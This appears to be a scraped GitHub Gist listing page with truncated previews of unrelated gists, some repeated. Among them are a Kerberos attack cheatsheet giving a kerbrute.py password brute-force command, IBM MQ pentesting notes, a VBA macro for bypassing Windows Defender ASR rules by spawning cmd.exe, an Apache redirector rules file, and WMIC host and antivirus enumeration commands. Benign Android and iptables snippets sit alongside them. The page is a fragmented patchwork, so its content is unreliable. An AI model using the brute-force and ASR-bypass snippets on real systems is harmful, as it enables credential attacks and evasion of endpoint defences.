With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
andytannn
andytannn
/ kerberos_attacks_cheatsheet.md
Created
April 23, 2023 11:58
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
mgeeky
/ IBM-MQ-Pentesting-notes.md
Last active
July 2, 2025 08:47
Practical IBM MQ Penetration Testing notes, couple of handy tips and punch-q installation walkthrough
In order to interact with IBM MQ in any way, we need to install IBM MQ Client libraries, available only on IBM website. Account registration will be required to get hands on them.
Pre-requisites: IBM MQ Client
- Download the IBM MQ V9.0.0.4 LTS Clients - the file should be named:
9.0.0.4-IBM-MQC-LinuxX64.tar.gz(9.0.0.4 Client install image for IBM MQ on Linux X86-64) - size: 397MB - Extract it to whatever directory.
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
infosecn1nja
/ ASR Rules Bypass.vba
Last active
August 21, 2025 05:39
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
curi0usJack
/ .htaccess
Last active
September 23, 2025 22:00
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| android.permission.ACCESS_ALL_DOWNLOADS | |
| android.permission.ACCESS_BLUETOOTH_SHARE | |
| android.permission.ACCESS_CACHE_FILESYSTEM | |
| android.permission.ACCESS_CHECKIN_PROPERTIES | |
| android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
| android.permission.ACCESS_DOWNLOAD_MANAGER | |
| android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
| android.permission.ACCESS_DRM_CERTIFICATES | |
| android.permission.ACCESS_EPHEMERAL_APPS | |
| android.permission.ACCESS_FM_RADIO |
xorrior
/ wmic_cmds.txt
Last active
October 25, 2025 16:57
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
evandrix
/ AndroidManifest.xml
Created
October 19, 2013 16:39
Android: Get Contact Details (ID, Name, Phone, Photo) @ http://tausiq.wordpress.com/2012/08/23/android-get-contact-details-id-name-phone-photo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <manifest xmlns:android="http://schemas.android.com/apk/res/android" | |
| package="com.example" | |
| android:versionCode="1" | |
| android:versionName="1.0"> | |
| <uses-sdk android:minSdkVersion="8"/> | |
| <uses-permission android:name="android.permission.READ_CONTACTS" /> | |
| <application android:label="@string/app_name"> |
virtualstaticvoid
/ iptables_rules.sh
Created
June 14, 2011 08:58
25 Most Frequently Used Linux IPTables Rules Examples
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modify this file accordingly for your specific requirement. | |
| # http://www.thegeekstuff.com | |
| # 1. Delete all existing rules | |
| iptables -F | |
| # 2. Set default chain policies | |
| iptables -P INPUT DROP | |
| iptables -P FORWARD DROP | |
| iptables -P OUTPUT DROP |